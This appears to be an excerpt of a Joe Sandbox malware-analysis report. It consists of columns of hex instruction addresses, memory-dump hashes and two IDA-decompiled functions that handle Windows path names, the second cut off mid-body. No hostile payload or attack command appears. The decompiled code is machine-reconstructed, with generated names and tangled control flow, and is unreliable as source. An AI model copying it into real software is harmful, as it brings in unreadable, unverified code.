                                                    0x018861d0
                                                    0x018861dc
                                                    0x018861de
                                                    0x018861e1
                                                    0x018861e4
                                                    0x018861e6
                                                    0x018861e8
                                                    0x018861e8
                                                    0x018861e8
                                                    0x018861e8
                                                    0x018861e6
                                                    0x018861ec
                                                    0x018861f3
                                                    0x01886203
                                                    0x01886209
                                                    0x0188620a
                                                    0x01886216
                                                    0x0188621d
                                                    0x01886227
                                                    0x01886241
                                                    0x01886246
                                                    0x0188624c
                                                    0x01886257
                                                    0x01886259
                                                    0x0188625c
                                                    0x0188625e
                                                    0x01886260
                                                    0x01886260
                                                    0x01886260
                                                    0x01886260
                                                    0x0188625e
                                                    0x01886264
                                                    0x01886267
                                                    0x01886269
                                                    0x01886315
                                                    0x01886315
                                                    0x0188631b
                                                    0x0188631e
                                                    0x01886324
                                                    0x01886327
                                                    0x0188632f
                                                    0x01886330
                                                    0x01886333
                                                    0x0188633a
                                                    0x0188633c
                                                    0x01886335
                                                    0x01886335
                                                    0x01886335
                                                    0x0188633f
                                                    0x01886342
                                                    0x0188634c
                                                    0x01886352
                                                    0x01886355
                                                    0x01886355
                                                    0x01886359
                                                    0x00000000
                                                    0x0188626f
                                                    0x01886275
                                                    0x01886275
                                                    0x01886278
                                                    0x0188627e
                                                    0x0188627e
                                                    0x01886281
                                                    0x01886287
                                                    0x0188628d
                                                    0x01886298
                                                    0x0188629c
                                                    0x018862a2
                                                    0x0188629e
                                                    0x0188629e
                                                    0x0188629e
                                                    0x018862a7
                                                    0x018862a7
                                                    0x018862aa
                                                    0x018862b0
                                                    0x018862f0
                                                    0x018862f0
                                                    0x018862f2
                                                    0x018862f8
                                                    0x018862fd
                                                    0x018862b2
                                                    0x018862b2
                                                    0x018862b2
                                                    0x018862b5
                                                    0x018862dd
                                                    0x018862e2
                                                    0x018862e5
                                                    0x018862b7
                                                    0x018862b8
                                                    0x018862bb
                                                    0x018862bd
                                                    0x018862c0
                                                    0x018862c4
                                                    0x018862cd
                                                    0x018862cd
                                                    0x018862c0
                                                    0x018862bb
                                                    0x018862b5
                                                    0x01886302
                                                    0x01886303
                                                    0x01886305
                                                    0x01886305
                                                    0x01886305
                                                    0x0188630c
                                                    0x0188630c
                                                    0x00000000
                                                    0x0188627e
                                                    0x01886269
                                                    0x01885eac
                                                    0x01885ebb
                                                    0x01885ebe
                                                    0x01885ecb
                                                    0x01885ecb
                                                    0x01885ece
                                                    0x01885ece
                                                    0x01885ed4
                                                    0x01885ed7
                                                    0x01885ed9
                                                    0x01885edb
                                                    0x01885edb
                                                    0x01885ee1
                                                    0x01885ee1
                                                    0x01885ee3
                                                    0x01885f20
                                                    0x01885f20
                                                    0x01885ee5
                                                    0x01885ee5
                                                    0x01885ee5
                                                    0x01885ee8
                                                    0x01885f11
                                                    0x01885f18
                                                    0x01885eea
                                                    0x01885eea
                                                    0x01885eed
                                                    0x01885ef2
                                                    0x01885ef8
                                                    0x01885efb
                                                    0x01885f0a
                                                    0x01885f0a
                                                    0x01885eed
                                                    0x01885ee8
                                                    0x01885f22
                                                    0x01885f28
                                                    0x00000000
                                                    0x00000000
                                                    0x01885f30
                                                    0x01885f31
                                                    0x01885f37
                                                    0x01885f3a
                                                    0x01885f3d
                                                    0x01885f44
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x01885f46
                                                    0x01885f48
                                                    0x01885f4d
                                                    0x00000000
                                                    0x01885f4d
                                                    0x01885dda
                                                    0x01885ddf
                                                    0x00000000
                                                    0x01885ddf
                                                    0x01885dd8
                                                    0x01885da7
                                                    0x01885da9
                                                    0x01885dac
                                                    0x01885dae
                                                    0x00000000
                                                    0x01885db4
                                                    0x01885db4
                                                    0x00000000
                                                    0x01885db4
                                                    0x01885dae
                                                    0x01885d88
                                                    0x01885d8d
                                                    0x01886363
                                                    0x01886369
                                                    0x0188636a
                                                    0x01886370
                                                    0x01886372
                                                    0x0188637a
                                                    0x0188637b
                                                    0x0188637d
                                                    0x00000000
                                                    0x00000000
                                                    0x0188637f
                                                    0x01886385
                                                    0x00000000
                                                    0x01886385
                                                    0x01885d38
                                                    0x01885d3b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x01885d3b
                                                    0x01885d27
                                                    0x01885d29
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x01886360
                                                    0x00000000
                                                    0x01886360
                                                    0x01885c10
                                                    0x01885c10
                                                    0x018863da
                                                    0x018863e5
                                                    0x018863e5

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 41a4462313070e2086366ffcef33ff86b7b3da2553ec6fd5a6f4b0de58617201
                                                    • Instruction ID: 2a60737e5b291ac00c92e75d7364ebaba2a014014490ff1b3586fa79455c4219
                                                    • Opcode Fuzzy Hash: 41a4462313070e2086366ffcef33ff86b7b3da2553ec6fd5a6f4b0de58617201
                                                    • Instruction Fuzzy Hash: E7422B75900229CFDB24DF68C880BA9BBB1FF45304F1581AAD94DEB342E774AA85CF51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017D4120 Relevance: .4, Instructions: 444COMMONCrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 92%
                                                    			E017D4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x18ad360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E017EF232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E017D6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L017D4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E017D6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M017D45F8))) {
												case 0:
													_v568 = 0x1791078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x17911c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L017D4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E017FF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E017FF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E017B52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E017CEB70(1, 0x18a79a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E017CAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E017F95D0();
																			L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E017FB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E017F3D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E017FB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                                    0x017d4128
                                                    0x017d4135
                                                    0x017d413c
                                                    0x017d4141
                                                    0x017d4145
                                                    0x017d4147
                                                    0x017d414e
                                                    0x017d4151
                                                    0x017d4159
                                                    0x017d415c
                                                    0x017d4160
                                                    0x017d4164
                                                    0x017d4168
                                                    0x017d416c
                                                    0x017d417f
                                                    0x017d4181
                                                    0x017d446a
                                                    0x017d446a
                                                    0x017d418c
                                                    0x017d4195
                                                    0x017d4199
                                                    0x017d4432
                                                    0x017d4439
                                                    0x017d443d
                                                    0x017d4442
                                                    0x017d4447
                                                    0x00000000
                                                    0x017d419f
                                                    0x017d41a3
                                                    0x017d41b1
                                                    0x017d41b9
                                                    0x017d41bd
                                                    0x017d45db
                                                    0x017d45db
                                                    0x00000000
                                                    0x017d41c3
                                                    0x017d41c3
                                                    0x017d41ce
                                                    0x017d41d4
                                                    0x0181e138
                                                    0x0181e13e
                                                    0x0181e169
                                                    0x0181e16d
                                                    0x0181e19e
                                                    0x0181e16f
                                                    0x0181e16f
                                                    0x0181e175
                                                    0x0181e179
                                                    0x0181e18f
                                                    0x0181e193
                                                    0x00000000
                                                    0x0181e199
                                                    0x00000000
                                                    0x0181e199
                                                    0x0181e193
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x017d41da
                                                    0x017d41da
                                                    0x017d41df
                                                    0x017d41e4
                                                    0x017d41ec
                                                    0x017d4203
                                                    0x017d4207
                                                    0x0181e1fd
                                                    0x017d4222
                                                    0x017d4226
                                                    0x0181e1f3
                                                    0x0181e1f3
                                                    0x017d422c
                                                    0x017d422c
                                                    0x017d4233
                                                    0x0181e1ed
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x017d4239
                                                    0x017d4239
                                                    0x017d4239
                                                    0x017d4239
                                                    0x017d4233
                                                    0x017d4226
                                                    0x017d41ee
                                                    0x017d41ee
                                                    0x017d41f4
                                                    0x017d4575
                                                    0x0181e1b1
                                                    0x0181e1b1
                                                    0x00000000
                                                    0x017d457b
                                                    0x017d457b
                                                    0x017d4582
                                                    0x0181e1ab
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x017d4588
                                                    0x017d4588
                                                    0x017d458c
                                                    0x0181e1c4
                                                    0x0181e1c4
                                                    0x00000000
                                                    0x017d4592
                                                    0x017d4592
                                                    0x017d4599
                                                    0x0181e1be
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x017d459f
                                                    0x017d459f
                                                    0x017d45a3
                                                    0x0181e1d7
                                                    0x0181e1e4
                                                    0x00000000
                                                    0x017d45a9
                                                    0x017d45a9
                                                    0x017d45b0
                                                    0x0181e1d1
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x017d45b6
                                                    0x017d45b6
                                                    0x017d45b6
                                                    0x00000000
                                                    0x017d45b6
                                                    0x017d45b0
                                                    0x017d45a3
                                                    0x017d4599
                                                    0x017d458c
                                                    0x017d4582
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x017d41f4
                                                    0x017d423e
                                                    0x017d4241
                                                    0x017d45c0
                                                    0x017d45c4
                                                    0x00000000
                                                    0x017d45ca
                                                    0x017d45ca
                                                    0x00000000
                                                    0x0181e207
                                                    0x0181e20f
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x017d45d1
                                                    0x00000000
                                                    0x00000000
                                                    0x017d45ca
                                                    0x00000000
                                                    0x017d4247
                                                    0x017d4247
                                                    0x017d4247
                                                    0x017d4249
                                                    0x017d4249
                                                    0x017d4249
                                                    0x017d4251
                                                    0x017d4251
                                                    0x017d4257
                                                    0x017d425f
                                                    0x017d426e
                                                    0x017d4270
                                                    0x017d427a
                                                    0x0181e219
                                                    0x0181e219
                                                    0x017d4280
                                                    0x017d4282
                                                    0x017d4456
                                                    0x017d45ea
                                                    0x00000000
                                                    0x017d45f0
                                                    0x0181e223
                                                    0x00000000
                                                    0x0181e223
                                                    0x017d445c
                                                    0x017d445c
                                                    0x00000000
                                                    0x017d445c
                                                    0x00000000
                                                    0x017d4288
                                                    0x017d428c
                                                    0x0181e298
                                                    0x017d4292
                                                    0x017d4292
                                                    0x017d429e
                                                    0x017d42a3
                                                    0x017d42a7
                                                    0x017d42ac
                                                    0x0181e22d
                                                    0x017d42b2
                                                    0x017d42b2
                                                    0x017d42b9
                                                    0x017d42bc
                                                    0x017d42c2
                                                    0x017d42ca
                                                    0x017d42cd
                                                    0x017d42cd
                                                    0x017d42d4
                                                    0x017d433f
                                                    0x017d433f
                                                    0x017d42d6
                                                    0x017d42d6
                                                    0x017d42d9
                                                    0x017d42dd
                                                    0x017d42eb
                                                    0x0181e23a
                                                    0x017d42f1
                                                    0x017d4305
                                                    0x017d430d
                                                    0x017d4315
                                                    0x017d4318
                                                    0x017d431f
                                                    0x017d4322
                                                    0x017d432e
                                                    0x017d433b
                                                    0x017d433b
                                                    0x00000000
                                                    0x017d432e
                                                    0x017d42eb
                                                    0x017d434c
                                                    0x017d434e
                                                    0x017d4352
                                                    0x017d4359
                                                    0x017d435e
                                                    0x017d4361
                                                    0x017d436e
                                                    0x017d438a
                                                    0x017d438e
                                                    0x017d4396
                                                    0x017d439e
                                                    0x017d43a1
                                                    0x017d43ad
                                                    0x017d43bb
                                                    0x017d43bb
                                                    0x017d43ad
                                                    0x017d436e
                                                    0x017d43bf
                                                    0x017d43c5
                                                    0x017d4463
                                                    0x017d4463
                                                    0x017d43ce
                                                    0x017d43d5
                                                    0x017d43d9
                                                    0x017d43df
                                                    0x017d4475
                                                    0x017d4479
                                                    0x017d4491
                                                    0x017d4491
                                                    0x017d4479
                                                    0x017d43e5
                                                    0x017d43eb
                                                    0x017d43f4
                                                    0x017d43f6
                                                    0x017d43f9
                                                    0x017d43fc
                                                    0x017d43ff
                                                    0x017d44e8
                                                    0x017d44ed
                                                    0x017d44f3
                                                    0x0181e247
                                                    0x00000000
                                                    0x017d44f9
                                                    0x017d4504
                                                    0x017d4508
                                                    0x017d450f
                                                    0x0181e269
                                                    0x00000000
                                                    0x017d4515
                                                    0x017d4519
                                                    0x017d4531
                                                    0x017d4534
                                                    0x017d4537
                                                    0x017d453e
                                                    0x017d4541
                                                    0x017d454a
                                                    0x0181e255
                                                    0x0181e255
                                                    0x0181e25b
                                                    0x0181e25e
                                                    0x0181e261
                                                    0x0181e261
                                                    0x017d4555
                                                    0x017d4559
                                                    0x017d455d
                                                    0x0181e26d
                                                    0x0181e270
                                                    0x0181e274
                                                    0x0181e27a
                                                    0x0181e27d
                                                    0x0181e28e
                                                    0x0181e28e
                                                    0x017d4563
                                                    0x017d4563
                                                    0x017d4569
                                                    0x017d4569
                                                    0x00000000
                                                    0x017d455d
                                                    0x017d450f
                                                    0x00000000
                                                    0x017d44f3
                                                    0x017d43ff
                                                    0x017d4405
                                                    0x017d4405
                                                    0x017d4405
                                                    0x017d42ac
                                                    0x017d428c
                                                    0x017d4282
                                                    0x017d4407
                                                    0x017d440d
                                                    0x0181e2af
                                                    0x0181e2af
                                                    0x017d4413
                                                    0x017d4413
                                                    0x00000000
                                                    0x017d41d4
                                                    0x00000000
                                                    0x017d41c3
                                                    0x017d41bd
                                                    0x017d4415
                                                    0x017d4415
                                                    0x017d4416
                                                    0x017d4417
                                                    0x017d4429
                                                    0x017d416e
                                                    0x017d416e
                                                    0x017d4175
                                                    0x017d4498
                                                    0x017d449f
                                                    0x0181e12d
                                                    0x00000000
                                                    0x0181e133
                                                    0x00000000
                                                    0x0181e133
                                                    0x017d44a5
                                                    0x017d44a5
                                                    0x017d44aa
                                                    0x00000000
                                                    0x017d44bb
                                                    0x017d44ca
                                                    0x017d44d6
                                                    0x017d44d7
                                                    0x017d44d8
                                                    0x017d44e3
                                                    0x017d44e3
                                                    0x017d44aa
                                                    0x017d417b
                                                    0x017d417b
                                                    0x017d417b
                                                    0x00000000
                                                    0x017d417b
                                                    0x017d4175
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1755e78adea51aa51b76a7e7d40d3e976bf648f29677c092b324726373058179
                                                    • Instruction ID: 3f1c18852c0cdddb34ec0b2a0c569c8b65080f7fd344e734320f81ee0cb394a8
                                                    • Opcode Fuzzy Hash: 1755e78adea51aa51b76a7e7d40d3e976bf648f29677c092b324726373058179
                                                    • Instruction Fuzzy Hash: 10F179716082158BC725CF18C484A7AFBF1BF88714F54896EF98ACBA94E734D981CB52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017E20A0 Relevance: .4, Instructions: 420COMMONCrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 92%
                                                    			E017E20A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x18a8714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E017E2EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E017E2EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E017B58EC(_t240);
									_t221 =  *0x18a5cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x18a5cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E017F4A2C(0x18a6e40, 0x17f4b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
